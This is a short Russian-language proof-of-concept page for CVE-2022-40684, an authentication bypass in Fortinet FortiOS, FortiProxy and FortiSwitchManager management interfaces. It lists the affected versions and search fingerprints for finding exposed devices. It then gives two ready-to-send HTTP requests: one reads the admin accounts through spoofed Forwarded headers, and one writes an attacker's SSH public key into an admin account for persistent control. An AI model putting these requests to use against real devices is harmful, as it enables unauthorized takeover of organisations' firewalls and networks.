
PoC и эксплойт для CVE-2022-40684, обход аутентификации в интерфейсах управления Fortinet FortiOS, FortiProxy и FortiSwitchManager, позволяющий получить несанкционированный административный доступ через специально сформированные HTTP-запросы.
Любое физическое или юридическое лицо, использующее сеть, должно соблюдать конституционные законы, соблюдать общественный порядок, уважать общественную мораль, не наносить ущерб сетевой безопасности и не использовать сеть для действий, наносящих ущерб национальной безопасности, чести и интересам.
Fortinet — всемирно известный поставщик продуктов и решений для сетевой безопасности, включая брандмауэры, антивирусное программное обеспечение, системы предотвращения вторжений и компоненты защиты конечных точек. В интерфейсе управления затронутых продуктов FortiOS, FortiProxy и FortiSwitchManager можно обойти аутентификацию, используя альтернативный путь или канал, и выполнять операции в интерфейсе управления без аутентификации с помощью специально созданных HTTP- или HTTPS-запросов.
Высокий
FortiOS версии 7.2.0 - 7.2.1 FortiOS версии 7.0.0 - 7.0.6 FortiProxy версии 7.2.0 FortiProxy версии 7.0.0 - 7.0.6 FortiSwitchManager версии 7.2.0 FortiSwitchManager версии 7.0.0
title="FortiProxy“
title="FortiGate"

GET /api/v2/cmdb/system/admin HTTP/1.1
Host: 目标
User-Agent: Node.js
Accept-Encoding: gzip, deflate
Accept: */*
Hosts: 127.0.0.1:9980
Forwarded: by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=
X-Forwarded-Vdom: root

PUT /api/v2/cmdb/system/admin/用户名 HTTP/2
Host: 目标
User-Agent: Report Runner
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"
Content-Length: 589
Content-Type: application/json
{"ssh-public-key1": "\"公钥内容\""}

